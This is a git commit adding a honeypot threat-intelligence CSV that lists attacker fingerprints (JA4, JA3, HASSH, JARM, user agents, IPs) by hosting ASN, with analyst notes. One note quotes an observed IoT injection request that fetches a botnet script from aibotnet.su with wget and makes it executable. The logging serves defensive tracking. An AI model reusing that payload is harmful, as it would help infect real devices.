From 805ce54d6b181cdaab453e7e50cfac14cc371b6a Mon Sep 17 00:00:00 2001 From: hrbrmstr Date: Mon, 20 Jul 2026 07:23:29 -0400 Subject: chore: weekly asn update --- kevlar/2026-07-20/honeylabs/fingerprints.csv | 33 ++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 kevlar/2026-07-20/honeylabs/fingerprints.csv (limited to 'kevlar/2026-07-20/honeylabs/fingerprints.csv') diff --git a/kevlar/2026-07-20/honeylabs/fingerprints.csv b/kevlar/2026-07-20/honeylabs/fingerprints.csv new file mode 100644 index 0000000..cb63736 --- /dev/null +++ b/kevlar/2026-07-20/honeylabs/fingerprints.csv @@ -0,0 +1,33 @@ +asn,asn_org,source_ip,fingerprint_type,fingerprint,ssh_banner_ua,tls_version,notes +AS57043,Hostkey B.v.,132.243.194.215,ja4h,ge11nn0400_777e992b8532,,,"IoT MIPS downloader GET /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh;chmod+777+./kla.sh -- NEW this week vs HASSH libssh_0.9.6 last week (different IP)" +AS57043,Hostkey B.v.,132.243.194.215,ua,Mozilla/5.0,,,"Generic Mozilla UA on botnet callback port 6001" +AS51396,Pfcloud UG,various,ua,Go-http-client/1.1,,,"3 IPs - dominant in 8080/3128/3000/9090/8443 scanning" +AS51396,Pfcloud UG,various,ua,Mozilla/5.0 zgrab/0.x,,,"3 IPs - 8081/3001/3000 scanning" +AS51396,Pfcloud UG,various,ua,odin-scanner/0.4,,,"NEW THIS WEEK -- 38 events, scans 20128/11235 'Hello World' on port 80" +AS51396,Pfcloud UG,various,ua,Hello World,,,"12 events, port 80 <-- distinctive minimalistic UA suggesting custom tooling" +AS51396,Pfcloud UG,204.76.203.18,hassh-server,425d29fe50d8e4f5e37efb6e24bcf660,SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u7,,Censys-enriched server-side HASSH; this is the lead of the 204.76.203.x cluster (13K+ sponge sessions) +AS51396,Pfcloud UG,204.76.203.18,ja4tscan,65160_2-1-1-4-1-3_1460_10_1-2,,,"Distinctive TCP fingerprint MTU 42340 -- not the default Ubuntu 65160 -- appears custom-tuned (smaller MSS)" +AS51852,Private Layer INC,81.17.28.130,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.15,,NEW primary Honeylabs IP this week (vs 179.43.134.114 prior; prior week same OpenSSL but 0.10 suffix - upgrade) +AS51852,Private Layer INC,81.17.28.130,ua,Chrome/144.0.0.0 Safari/537.36,,,"HTTP HEAD / scanning via Windows Chrome 144 -- 252 events over 5 days" +AS51852,Private Layer INC,179.43.186.240,ua,Go-http-client/1.1,,,"6 events HTTP scanning port 443" +AS30823,aurologic GmbH,41.216.188.21,ja4,t13i190800_9dc949149365_97f8aa674fd9,,TLSv1.3,JA4 base 9dc949149365 -- SAME JA4 as FLOKINET Tor exit (AS200651); the 190800 i-form means TLS 1.3 + i08 (single cipher only) +AS30823,aurologic GmbH,41.216.188.21,ja3,19e29534fd49dd27d09234e639c4057e,,TLSv1.3,Distinct JA3 baseline +AS30823,aurologic GmbH,41.216.188.21,ja4h,ge11nn0500_9af7e0472034,,HTTP,Android Chrome 76 mobile UA (decoy or legitimate mobile) +AS200651,FlokiNET ehf,185.100.87.136,hassh-client,e54ef3ec27fe1fea7ab64d3fa05359fd,SSH-2.0-OpenSSH_10.2p1,,UPGRADED from OpenSSH_10.1 last week (subtle 0.1 bump) -- same client HASSH (OpenSSH_10.x series shares HASSH) +AS200651,FlokiNET ehf,185.100.87.136,hassh-server,b1bff636ebbdbaa9dd2ad97fd173c956,SSH-2.0-OpenSSH_9.9,,Server-side OpenSSH_9.9 on port 7288 (alt SSH port -- furtive) +AS200651,FlokiNET ehf,185.100.87.136,ja4,t13i1909h2_9dc949149365_97f8aa674fd9,,TLSv1.3,Same JA4 as 2026-07-13 (stable) +AS200651,FlokiNET ehf,185.100.87.136,ja3,7c1e207beb00684bbbe144f1b0abe1d5,,TLSv1.3,Same JA3 as 2026-07-13 (stable) +AS200651,FlokiNET ehf,185.100.87.136,ja4h,ge11nn0400_88d30a62b7ad,,HTTP,Same JA4H as 2026-07-13 (stable) +AS200651,FlokiNET ehf,185.100.87.136,ja4h,po11nn0600_c9506d37ac14,,HTTP,NEW this week -- associated with SPARK COMMIT: 08059e95... UA + content-type: application/octet-stream body (CVE-style implant reporting) +AS200651,FlokiNET ehf,185.100.87.136,jarm,2ad2ad16d2ad2ad00042d42d000000332dc9cd7d90589195193c8bb05d84fa,,Tor exit TLS 1.3 256gcm + cipher suite resolution +AS198953,Proton66 OOO,176.120.22.16,greynoise,suspicious,,,"GreyNoise classifies suspicious -- tags: MySQL Protocol, TLS Crawler, Python requests client, Generic Suspicious Linux Command" +AS214940,Kprohost LLC,77.83.39.119,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,,"SHARED HASSH across all Ubuntu OpenSSH 8.9p1 in this block -- fleet uniformity" +AS214940,Kprohost LLC,77.83.39.119,greynoise,malicious,,,"Classified malicious by GreyNoise -- tags: Web Crawler, TLS Crawler, ENV Crawler (.env!), GoogleBot pretender, Java HTTP client" +AS210644,Aeza Group LLC,various,no-honeylabs-data,,,"0 honeypot events this week -- prior week single event from 46.226.162.205 has vanished" +AS209847,(real AS41745 FORTIS),45.144.28.70,hassh-server,41ff3ecd1458b0bf86e1b4891636213e,SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.16,+ SSH,STILL shared Ubuntu 8.9p1 HASSH with AS214940; network creation 2026-06-06 (very new BGP) -- GreyNoise malicious: HTTP OPTIONS crawler, Go HTTP client, Generic Brute Force, TLS Crawler +AS209847,(real AS41745 FORTIS),45.144.28.70,ja4tscan,65160_2-4-8-1-3_1460_7_1-2,,Ubuntu default MTU 65160 (no anti-fingerprint tuning) +AS211720,Datashield Inc.,185.231.33.46,jarm,07d19d12d21d21d07c42d43d000000f50d155305214cf247147c43c0f1a823,,Server-side JARM -- distinctive fingerprint; TLS 1.0/1.1 still enabled (DOWNGRADE possible misconfig) +AS211720,Datashield Inc.,185.231.33.46,cert-cn,prohaska.beatty.biz,,,"Self-signed cert -- CN=prohaska.beatty.biz, O=Prohaska-Beatty, OU=compress, ST=HI, C=US, emailAddress=compress@prohaska.beatty.biz" +AS14956,RouterHosting LLC,216.126.239.17,hassh-server,e42184b06d45385a906f0803d04c83da,SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.18,,OpenSSH 9.6 (more current than peers; security-conscious maintenance) +AS14956,RouterHosting LLC,216.126.239.17,ua,PMTA-Auto,,,"PowerMTA mail bruteforce scanner UA; 55 events over 4 days on ports 9900/2698/12124/2156/4071 - proxy brute" +AS14956,RouterHosting LLC,216.126.239.17,wkzeug-fofa,"Werkzeug/3.1.8 Python/3.12.3 / WWW-Authenticate: Basic realm=fofa_monitor",,Distinctive misconfiguration: HTTP 401 with fofa_monitor Basic realm -- Censys flagged as Unencrypted HTTP Weak Auth (high severity) \ No newline at end of file -- cgit v1.2.3